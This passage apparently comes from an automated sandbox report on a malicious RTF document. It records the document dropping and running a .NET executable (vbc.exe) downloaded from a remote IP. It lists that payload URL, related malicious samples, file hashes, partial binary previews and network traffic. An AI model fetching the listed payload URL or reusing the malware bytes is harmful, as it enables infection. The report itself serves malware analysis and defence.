http://www.icra.org/vocabulary/. | vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | false | - | high
http://investor.msn.com/ | explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://www.msn.com/?ocid=iehp | explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp | false | - | high
http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp | false | - | high
http://www.piriform.com/ccleaner | explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | false | - | high
http://computername/printers/printername/.printer | explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | false | - | high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P& | explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | false | - | high
http://www.msn.com/?ocid=iehps | explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp | false | - | high
https://support.mozilla.org | explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | false | - | high
http://servername/isapibackend.dll | explorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                                            Contacted IPs


                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.46.199.153 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
34.102.136.180 | cuteprofessionalscrubs.com | United States | 15169 | GOOGLEUS | false

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:528701
                                                            Start date:25.11.2021
                                                            Start time:17:23:10
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 53s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:3nkW4MtwSD (renamed file extension from none to rtf)
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:9
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winRTF@10/9@3/2
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 16.7% (good quality ratio 16%)
                                                            • Quality average: 73.5%
                                                            • Quality standard deviation: 27.8%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Found warning dialog
                                                            • Click Ok
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
17:24:14 | API Interceptor | 70x Sleep call for process: EQNEDT32.EXE modified
17:24:17 | API Interceptor | 146x Sleep call for process: vbc.exe modified
17:24:55 | API Interceptor | 146x Sleep call for process: raserver.exe modified
17:25:40 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
198.46.199.153 | lSBl5Mhq80.rtf | malicious | 198.46.199.153/76734/VBC.exe
198.46.199.153 | new order.docx | malicious | 198.46.199.153/76734/VBC.exe
198.46.199.153 | new order.xlsx | malicious | 198.46.199.153/68886/VBC.exe
198.46.199.153 | Neue Bestellung.xlsx | malicious | 198.46.199.153/566665/VBC.exe
198.46.199.153 | purchase order.xlsx | malicious | 198.46.199.153/9994/VBC.exe
198.46.199.153 | neworder.xlsx | malicious | 198.46.199.153/566665/vbc.exe
198.46.199.153 | PO 35572 FOR CONTRA 23.08.xlsx | malicious | 198.46.199.153/1112/VBC.exe
198.46.199.153 | PO 35572 FOR CONTRA 23.08.xlsx | malicious | 198.46.199.153/1112/VBC.exe
198.46.199.153 | quotation.xlsx | malicious | 198.46.199.153/1112/VBC.exe
198.46.199.153 | order2123.xlsx | malicious | 198.46.199.153/1112/VBC.exe

                                                            Domains

                                                            No context

                                                            ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | Employee payment plan.HTM | malicious | 23.95.214.111
AS-COLOCROSSINGUS | ATT67586.HTM | malicious | 172.245.112.92
AS-COLOCROSSINGUS | xF3wienie.xlsx | malicious | 198.23.207.111
AS-COLOCROSSINGUS | Quote Request - Linde Tunisia.xlsx | malicious | 107.173.191.111
AS-COLOCROSSINGUS | PO PENANG ORDER C0023.xlsx | malicious | 198.12.107.117
AS-COLOCROSSINGUS | BANK-SWIFT.xlsx | malicious | 107.173.229.133
AS-COLOCROSSINGUS | 1HT42224.xlsx | malicious | 198.23.207.36
AS-COLOCROSSINGUS | new order.xlsx | malicious | 198.23.251.13
AS-COLOCROSSINGUS | Shipping Schedule.xlsx | malicious | 198.12.91.205
AS-COLOCROSSINGUS | Product_Specification_Sheet.xlsx | malicious | 107.173.219.26
AS-COLOCROSSINGUS | lod2.xlsx | malicious | 198.23.207.36
AS-COLOCROSSINGUS | Payment Slip.xlsx | malicious | 198.46.136.245
AS-COLOCROSSINGUS | 20002.xlsx | malicious | 198.46.136.245
AS-COLOCROSSINGUS | lSBl5Mhq80.rtf | malicious | 198.46.199.153
AS-COLOCROSSINGUS | STATEMENT OF ACCOUNT.xlsx | malicious | 192.227.228.37
AS-COLOCROSSINGUS | new order.docx | malicious | 198.46.199.153
AS-COLOCROSSINGUS | Amended Order.xlsx | malicious | 192.3.121.173
AS-COLOCROSSINGUS | Payment Swift.xlsx | malicious | 198.12.107.104
AS-COLOCROSSINGUS | SOA.xlsx | malicious | 107.172.13.149
AS-COLOCROSSINGUS | Play_VM_582497.htm | malicious | 192.3.161.195

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true
                                                            Reputation:low
                                                            IE Cache URL:http://198.46.199.153/70007/vbc.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0..>...........[... ...`....@.. ....................................@.................................l[..O....`..H............................................................................ ............... ..H............text....<... ...>.................. ..`.rsrc...H....`.......@..............@..@.reloc...............H..............@..B.................[......H........H...!..........|j................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):5632
                                                            Entropy (8bit):4.215971182386183
                                                            Encrypted:false
                                                            SSDEEP:48:rf6resS6fB++YrNbC4FE/9c+FhHmJspzIf:+rexCBYrNbC4KFhPzy
                                                            MD5:A553A58C04781D311C71B7DA1B7CAD57
                                                            SHA1:10AD372D975F93EDA1DC9CD9A92D45992CA85F38
                                                            SHA-256:9BC8FBA0075B6F379D906661ACE1D80A764A1022213D127E3EAC56CFF5A41779
                                                            SHA-512:8C706B34EF18F8CE68401E6B9DF47EDF10D2BE81CA7725BC480412ED4BDB146EDF03CBF502721227CB1D132313F5131E62B94774617BF462FCB9B785E3E26BB6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{105A16FA-9724-40E9-B86D-EF139A6795E6}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6656
                                                            Entropy (8bit):3.5345865006836488
                                                            Encrypted:false
                                                            SSDEEP:96:YyOv6PI3Jv6BweyjGQ803dRybHF9qXXy3dwZ4HoCmWJZ3qrlircuA:YyGZh6meu80NRybl2WbZ6rErcZ
                                                            MD5:9E74D0391BDB20A19FCE576A18E374DD
                                                            SHA1:CAD0F85D1E24708A6CE05BB7791BCD8A1DE982D4
                                                            SHA-256:1A183A30D730EAE29C9EBFBF5DC2FD0B9F40BBCEAC2FFBD896C7778AED5B937D
                                                            SHA-512:F14F7D10706E955DA2D267BC28871D2342B10E8B7CD65FA7555E3B7157C8CD03BA8831CDC896495AE542C60749766E6137E007D657AE3599FB200558716DAB9B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: &.-.+.4.!.?.7.$.>.|...|.:.+.%.]._...!.4.#.&...2.`.(.2...?.1.-.....+.|.$.>.=.8.+...0.3.0.+.4.*.?.%./.+.~.,.<.6.6.7.<.?.?.?.%.)./.|.>.!.|.!...%.|.^.?.`...3.'.?.|.8.-.).?.'.%.%.$.6.^.;.,.?.%.7...$.?.9.8.3.(.2.(.+.?...?.|.=...8.?.8.|.*.7.,.!.5._.^.].5.|.7.,.[.?.?.3...!...0.'.).?.8...?.6.&.5.3...;.`.'.?./.2.%.?.?.4.1.?.%._.+.*.`.).%.^.-.*.&.>.,.9.6.(...[.~.3.?.2...=.,.`.7.8.).!.%.?.8.1.^.).7.3.6...@.[._.?...6.7.%.?.+.-.&.:.@.?.?.=.>.0.>.;.3.).?...+.0.].=.?.~.?._.?.].?.$.8.2.;.@.%.7.=.~.<.3.!.3.2.@...2.7.6.9.5.'.7.~.#./.].5./.<.=.:.9.!.8.9.].3.;.4.>._.>.@.....?.@.?.`.?.9.-.(.*.;.;.4.1.].?.^...,.*.[.<.8.].....?.?._.%.?.>.:.8.-.7.5.?.~.:.%.:._.3.7.@.'.[.0.+.%.9.;.$.9.^...:.:.9.?...(.[.>.$.:.|.3...,.|.$.&.&.?.;.3.3.>...4./.5.+.7.3.%.'.1.3.4.3.=.?.;.@.3.!.?.3.'...*.[...,.#.'./.5.&.!.!.*.:.3.~.?.2./.&.%.#.?.?.(.?._...[.4.*...*.^...<.^.,.|.(.,.[.?.(.).?.4.].-.+.<.*.?.%.%.>...&.).0.*.`.%.8.0.=.>.(.,.`...-...[.0.;.?.#.<.1.,.-.0.:.'.$.2.@.'.(.$.!._.3.;.].!.,.8.....6...0.?.-.?.3.'.9.0.@.,.].*.@.@.%.<.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3nkW4MtwSD.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 00:24:08 2021, mtime=Fri Nov 26 00:24:08 2021, atime=Fri Nov 26 00:24:12 2021, length=22268, window=hide
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):4.543786462395175
                                                            Encrypted:false
                                                            SSDEEP:12:8w5eFgXg/XAlCPCHaX6zBFB/IGUX+WNwfLkx0sOicvbSRkCl4S0seDtZ3YilMMEO:8w5y/XTKz3WhrHte2NHeDv3qlQd7Qy
                                                            MD5:0CAB2B6943F0D12CA4B6285B22202999
                                                            SHA1:AD018F3F3F6BAC905FC8999CCBAD2190A60FDCA0
                                                            SHA-256:A993ED6EB3B351B317C05744C641294B9A2CD735E57E8BBF4666C74C222C74FC
                                                            SHA-512:8424761740A2D9AEBC20190AC3FF290B782FC1B2C92E45FD6BE91376F47A0C4542EFB59437B8C7C587BE2892721E7EE749C3B63D307BA09CE6D0227C7E9CCB39
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: L..................F.... ...(..Od...(..Od.....Qd....V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1.....zS....Desktop.d......QK.XzS..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..V..zS.. .3NKW4M~1.RTF..J......zS..zS..*.........................3.n.k.W.4.M.t.w.S.D...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\3nkW4MtwSD.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.n.k.W.4.M.t.w.S.D...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.891962939381966
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJlHCoP/SmxWJToP/Sv:bCICoXeToXc
                                                            MD5:98198491AD9C6556CF158DF33B3EC4E5
                                                            SHA1:5FDDCDD11FD061308338442F8CDDFB10E536A397
                                                            SHA-256:E97FB0507D819A0D2EE95DFB51A9544E4907033C8F2FA486B6F4B584572EA5B8
                                                            SHA-512:6876CE8FE8FA0A5B1C7956B664F95FD1D0EA0CF69C719A82BF3EAE7830CC70C66D0AB9F266568C804D8FF1C85E60E43977A2481B12728CD0FBC074A3FF66D5BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: [folders]..Templates.LNK=0..3nkW4MtwSD.LNK=0..[misc]..3nkW4MtwSD.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\user\Desktop\~$kW4MtwSD.rtf
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\Public\vbc.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0..>...........[... ...`....@.. ....................................@.................................l[..O....`..H............................................................................ ............... ..H............text....<... ...>.................. ..`.rsrc...H....`.......@..............@..@.reloc...............H..............@..B.................[......H........H...!..........|j................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.083855353458583
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:3nkW4MtwSD.rtf
                                                            File size:22268
                                                            MD5:5aad2b6635b3069402aaf6ff389bea64
                                                            SHA1:a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
                                                            SHA256:718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
                                                            SHA512:2bcdcc3775f8d2a163b8b564232a5839fe625b8ab7f8b6de613b57abf436e6acb095d5bc2a081e966aa4422a9edb9a81df031d4da40add21cef4404aa45a5d3d
                                                            SSDEEP:384:hPD5SVOnYJqhGw3DUDFoI/QzRckPc/4XHry8MVxAy7aD+e:hPD5SInYEhGwGFoIcluHVxB7a
                                                            File Content Preview:{\rtf6611&-+4!?7$>|.|:+%]_.!4#&.2`(2.?1-..+|$>=8+.030+4*?%/+~,<667<???%)/|>!|!.%|^?`.3'?|8-)?'%%$6^;,?%7.$?983(2(+?.?|=.8?8|*7,!5_^]5|7,[??3.!.0')?8.?6&53.;`'?/2%??41?%_+*`)%^-*&>,96(.[~3?2.=,`78)!%?81^)736.@[_?.67%?+-&:@??=>0>;3)?.+0]=?~?_?]?$82;@%7=~<3!

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                             Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                             0 | 00000B6Ch | - | - | - | - | - | - | - | no
                                                             1 | 00000B35h | - | - | - | - | - | - | - | no

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                             Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                             11/25/21-17:25:23.079817 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 34.102.136.180 | 192.168.2.22
                                                             11/25/21-17:25:43.645796 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 34.102.136.180 | 192.168.2.22

                                                            Network Port Distribution

                                                            TCP Packets

                                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                             Nov 25, 2021 17:23:57.693909883 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:57.811109066 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:57.811188936 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:57.811558008 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:57.931919098 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:57.931982994 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:57.932010889 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:57.932039022 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:57.932213068 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:57.932466984 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.049350023 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049417019 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049448013 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049487114 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049524069 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049561977 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049599886 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049638033 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.049710989 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.049772024 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.049779892 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.166820049 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.166877985 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.166917086 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.166955948 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.166992903 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167032003 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167072058 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167109013 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167148113 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167171001 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167187929 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167207956 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167215109 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167227983 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167258978 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167267084 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167293072 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167304993 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167326927 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167346001 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167352915 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
